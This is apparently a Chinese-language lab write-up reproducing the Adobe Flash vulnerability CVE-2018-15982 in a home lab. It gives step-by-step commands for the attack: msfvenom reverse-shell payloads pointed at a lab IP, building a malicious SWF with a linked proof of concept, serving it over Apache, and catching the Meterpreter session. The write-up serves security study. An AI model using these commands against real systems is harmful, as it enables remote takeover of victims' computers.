CVE-2018-15982漏洞复现
开篇闲聊:
自从上次写完CVE-2018-4878后我就在想,有没有能简单粗暴干掉我的Win10主机的办法,找了半天,果然没找到(说不出是开心还是悲伤),但是找到了这个最接近最新版本的Flash的漏洞。
漏洞概述:
受影响的版本:
Adobe Flash Player <= 31.0.0.153
Adobe Flash Player Installer<= 31.0.0.108
不受影响的版本:
Adobe Flash Player 32.0.0.101
Adobe Flash Player Installer 31.0.0.122
作者的版本刚好是最底下的那个.....
不过我仔细看了它的起源经过:
2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞(CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。
看起来是个很时髦的漏洞,来开始吧!
复现环境:
Kail linux
Win7 + Flash 28(为啥不选最新版本呢?因为这个是做完4878剩下的环境,懒得再下新版了哈哈)
POC: https://github.com/B1eed/VulRec/tree/master/CVE-2018-15982
复现过程:
1、创建payload程序
root@wuyou:~/CVE-2018-15982# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.190.134 LPORT=4444 -f raw > 64.bin
root@wuyou:~/CVE-2018-15982# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.190.134 LPORT=4444 -f raw > 86.bin
2、生成文件视频文件和网页
root@wuyou:~/CVE-2018-15982# python CVE-2018-15982.py -i 86.bin -I 64.bin -o exploit.swf
3、开启Apache服务
root@wuyou:~/CVE-2018-4878# service apache2 start
root@wuyou:~/CVE-2018-4878# cp index.html /var/www/html/index.html
root@wuyou:~/CVE-2018-4878# cp exploit.swf /var/www/html/exploit.swf
4、开始监听
root@wuyou:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.190.134
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
5、在靶机打开网页
192.168.190.134/index.html
页面内容这是渗透机已经成功获取到Session了!